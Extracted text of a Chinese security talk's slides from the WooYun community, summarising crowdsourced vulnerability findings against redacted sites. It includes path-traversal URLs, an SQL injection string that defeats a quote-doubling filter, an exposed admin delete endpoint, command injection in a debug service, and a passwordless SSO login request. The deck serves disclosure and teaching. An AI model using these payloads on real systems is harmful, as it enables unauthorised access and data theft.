众测漏洞榜之脑洞篇

2020-03-01 56浏览

1.众测漏洞榜之脑洞篇 Valo@wooyun
2.01 我就是你一个域名劫持的故事
3.02 另类密码重置
4.03 “ 壕气厂商 ”
5.04 程序员的 “复仇 ”
6.04 程序员的 “复仇 ”http://xxxxx.com/feedBack/addSuggest.php?mod=addSuggest&suggestBelonged=,1,aaa&suggestType=,1,&sugges tDescrib=test&contactTel=test&contactEmail=test&contactQQ=111&c ontactPerson=test&attachValue=../2014/testinfo.html._7.jpgWarning:rename(/mnt/mfsxxxx/feedBack/../2014/testinfo.html._7.jpg,/mnt/mfs/x xxx/feedBack/../2014/2014111801267-1.html): No such file or directory in /apps/dat/web/newcode/xxxx-239/library/App/FeedBack/Suggest.php
7.04 程序员的 “复仇 ”http://xxcom/vendor/goodsAdd.php?mod=showTemplate&template=3c/../../../../../ ../../../../../../../../../../../mnt/mfs/xxxx/2014/201 4111801266-1
8.05 程序员的 “复仇 ” 2https://www.xxxxxxx.com/guarantee是某后台但是无法登陆查看源码有个 js/admin.js function delImg(_this){ var pic = $(_this).attr("rel"); $.post("/app/uploadimage?act=delimg", {image:pic},function(data){ if(data.status=='200'){ alert(data.msg); $ (_this).closest('.showimg').find('img').attr('src', '/img/x_tu.jpg'); // $(_this).remove(); // }else{ alert(’xxxxx'); } },'json'); }
9.06 程序员的 “复仇 ” 3
10.06 程序员的 “复仇 ” 3
11.07 金融背后的 “安全 ”
12.08 任意用户密码重置那些事
13.09 某电商越权实现 “脱库 ”
14.10 不同寻常的 SQL 注入
15.11 坑爹的过滤http://xxxxcom/index.php?action=user&method=search&pos_belong=2&pos_city=0&pos _type=0&keywords=a\%27%20or%201=1%20limit %200,10%23 注入点为 keywords 可以看出过滤规则为 replace ' '' ，那么 \' 过滤为 \'' 从而造成注入
16.12 “ 爆 ”库
17.13 不该写的 “ shell”
18.14 “ 失控 ”的权限 scitd 服务对 localhost 监听了 31415 端口，用以实现一些诊断和 bugreport 服务，但是对命令过滤不陆，例如陆陆陆 a_test-count 指令分支 , 导致存在 command injection 进而代码执行。然后这个 debug 服务应该还泄露了一大堆其他的权限，比如进行录音操作，操作屏幕什么的。
19.15 如何通过客户端搞定 “后端”
20.16 神奇的认证方式 -“ 无需密码 ” POST /network/SsoLogonAction.do HTTP/1.1 Hostxxxxx.com.cnConnection:keep-aliveContent-Length:145Cache-Control:max-age=0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,* /*;q=0.8 method=logon&checktrade=0&directPath=&needGetPassWord= 0&logonType=1&ssoLoginFlag=0&identityType=0&identityNo=6 422xxxxx01080813&returnUrl=&novc=y
21.安全无小事 Q&A
22.THANKS